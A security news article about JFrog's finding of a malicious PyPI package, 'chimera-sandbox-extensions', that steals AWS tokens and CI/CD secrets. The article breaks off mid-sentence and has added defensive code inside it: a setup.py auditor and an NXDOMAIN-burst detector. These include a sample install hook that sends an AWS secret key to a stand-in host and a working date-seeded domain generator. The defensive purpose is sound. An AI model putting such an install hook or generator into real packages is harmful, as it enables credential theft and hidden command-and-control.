
Hackers Upload Weaponized Packages to PyPI Repositories to Steal AWS Tokens and Sensitive Data



The JFrog Security Research team has uncovered a sophisticated malicious package named “chimera-sandbox-extensions” on the Python Package Index (PyPI), a widely used repository for Python software.

Uploaded by a user identified as “chimerai,” this package was designed to exploit unsuspecting developers by targeting users of the chimera-sandbox environment, aiming to harvest sensitive credentials and critical data, including AWS tokens, Jamf configurations, and CI/CD environment variables.

This discovery underscores the growing threat of software supply chain attacks, where malicious actors weaponize seemingly legitimate packages to infiltrate systems and exfiltrate valuable information.

Malicious Package Targets Corporate

The “chimera-sandbox-extensions” package employs a highly intricate payload delivery system, initiating its attack through a function called check_update() upon installation.
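Running code at install time is possible because setuptools lets a package replace pip's install step with its own command class. The following is an added example, not code from the article, from JFrog, or from the chimera-sandbox-extensions package: a small static audit that flags a setup.py which subclasses a setuptools command, registers it via cmdclass, or calls network and environment APIs. The SETUP_PY text it scans is constructed for illustration (the hostname example.invalid and the check_update() body are assumptions, not the real payload).

```python
"""Added example (not from the article or the package it describes): flag a
setup.py that hooks the install step, which is how a function such as
check_update() gets to run during `pip install`. SETUP_PY is constructed."""
import ast

# Setuptools commands whose subclasses run during pip install / develop.
HOOKABLE_COMMANDS = {"install", "develop", "egg_info", "build_py"}
# Calls that have no business in a build script: network, env, subprocess.
SUSPECT_CALLS = {"urlopen", "get", "post", "socket", "getenv", "Popen", "system"}

# Constructed sample: a post-install hook that reads an env var and phones home.
SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import urllib.request, os

def check_update():
    urllib.request.urlopen("http://example.invalid/u?k=" + os.environ.get("AWS_SECRET_ACCESS_KEY", ""))

class PostInstall(install):
    def run(self):
        install.run(self)
        check_update()

setup(name="demo", version="0.1", cmdclass={"install": PostInstall})
'''


def _callee_name(node):
    """Return the bare name of a call target: foo() -> 'foo', a.b.c() -> 'c'."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        return node.attr
    return ""


def audit_setup_py(source):
    """Return a list of human-readable findings for one setup.py source text."""
    tree = ast.parse(source)
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.ClassDef):
            for base in node.bases:
                base_name = _callee_name(base)
                if base_name in HOOKABLE_COMMANDS:
                    findings.append(
                        f"line {node.lineno}: class {node.name} subclasses "
                        f"setuptools command '{base_name}'"
                    )
        elif isinstance(node, ast.Call):
            name = _callee_name(node.func)
            if name in SUSPECT_CALLS:
                findings.append(f"line {node.lineno}: call to {name}()")
            if name == "setup":
                for kw in node.keywords:
                    if kw.arg == "cmdclass":
                        findings.append(
                            f"line {node.lineno}: setup(cmdclass=...) overrides "
                            "install commands"
                        )
    return findings


if __name__ == "__main__":
    for finding in audit_setup_py(SETUP_PY):
        print(finding)
```

A clean setup.py that only calls setup() with metadata produces no findings; any finding is a reason to read the file before installing, or to install with `--only-binary :all:` so no sdist build step runs at all.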

Chimera-sandbox-extensions project page on PyPI

This function leverages a pseudorandom Domain Generation Algorithm (DGA) within the CharStream class to create a series of domains, attempting connections to ten dynamically generated ...
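A DGA gives an implant a fresh list of candidate hostnames on every run, so that blocking one domain does not cut it off; the side effect defenders can see is a burst of lookups for names that mostly do not resolve. The block below is an added example, not code from the article, from JFrog, or from the package: a generic date-seeded generator standing in for the CharStream algorithm (the linear congruential generator, the 12-letter labels and the TLD rotation are assumptions, not the package's real algorithm), and a detector that scans DNS query log lines for a client that received many NXDOMAIN answers in a short window. The log lines and the client addresses are constructed for illustration.

```python
"""Added example (not from the article or the package it describes): an
illustrative seeded DGA plus an NXDOMAIN-burst detector over constructed DNS
query logs. Nothing here reproduces the real CharStream algorithm."""
import re
from collections import defaultdict
from datetime import date, datetime, timedelta

TLDS = ("com", "net", "org")  # hypothetical TLD rotation, not the package's


def generate_domains(seed_date, count=10):
    """Derive `count` hostnames from a date seed with a linear congruential
    generator. The same date always yields the same list, which is what lets
    an implant and its operator meet without a hard-coded C2 hostname."""
    state = seed_date.year * 10_000 + seed_date.month * 100 + seed_date.day
    domains = []
    for i in range(count):
        label = []
        for _ in range(12):
            state = (state * 1103515245 + 12345) & 0x7FFFFFFF
            label.append(chr(ord("a") + state % 26))
        domains.append("".join(label) + "." + TLDS[i % len(TLDS)])
    return domains


# Assumed log format, constructed for this example:
# 2025-06-10T09:00:00Z client=10.0.0.5 query=example.com rcode=NXDOMAIN
LOG_RE = re.compile(
    r"^(?P<ts>\S+) client=(?P<client>\S+) query=(?P<qname>\S+) rcode=(?P<rcode>\S+)$"
)


def parse_line(line):
    """Return (timestamp, client, qname, rcode) or None for unparsable lines."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
    return ts, m["client"], m["qname"].lower(), m["rcode"].upper()


def nxdomain_bursts(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {client: (largest_burst, first_three_qnames)} for every client
    that received at least `threshold` NXDOMAIN answers inside `window`."""
    per_client = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, client, qname, rcode = rec
        if rcode == "NXDOMAIN":
            per_client[client].append((ts, qname))
    flagged = {}
    for client, events in per_client.items():
        events.sort()
        best, start = 0, 0
        for end in range(len(events)):  # sliding window over sorted timestamps
            while events[end][0] - events[start][0] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[client] = (best, [q for _, q in events[:3]])
    return flagged


def build_sample_log(seed_date=date(2025, 6, 10)):
    """Constructed log: 10.0.0.5 behaves like an infected host walking the DGA
    list (only the last name is registered); 10.0.0.7 is an ordinary client
    with a single typo-induced NXDOMAIN."""
    base = datetime(2025, 6, 10, 9, 0, 0)
    lines = []
    for i, dom in enumerate(generate_domains(seed_date)):
        rcode = "NOERROR" if i == 9 else "NXDOMAIN"
        stamp = (base + timedelta(seconds=i)).isoformat() + "Z"
        lines.append(f"{stamp} client=10.0.0.5 query={dom} rcode={rcode}")
    for i, dom in enumerate(["pypi.org", "files.pythonhosted.org", "pypi.orgg", "github.com"]):
        rcode = "NXDOMAIN" if dom.endswith("orgg") else "NOERROR"
        stamp = (base + timedelta(seconds=i * 20)).isoformat() + "Z"
        lines.append(f"{stamp} client=10.0.0.7 query={dom} rcode={rcode}")
    return lines


if __name__ == "__main__":
    for client, (burst, sample) in nxdomain_bursts(build_sample_log()).items():
        print(f"{client}: {burst} NXDOMAIN answers in 60s, e.g. {sample}")
```

The burst heuristic is deliberately independent of what the generated names look like: it fires on the failure pattern, which survives even when the attacker changes the generator, and it is easy to run over resolver logs or Zeek dns.log exports after adjusting LOG_RE. Tune threshold and window against your own baseline; hosts that run DNS-heavy tooling will need an allowlist.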


Copyright of this story solely belongs to gbhackers.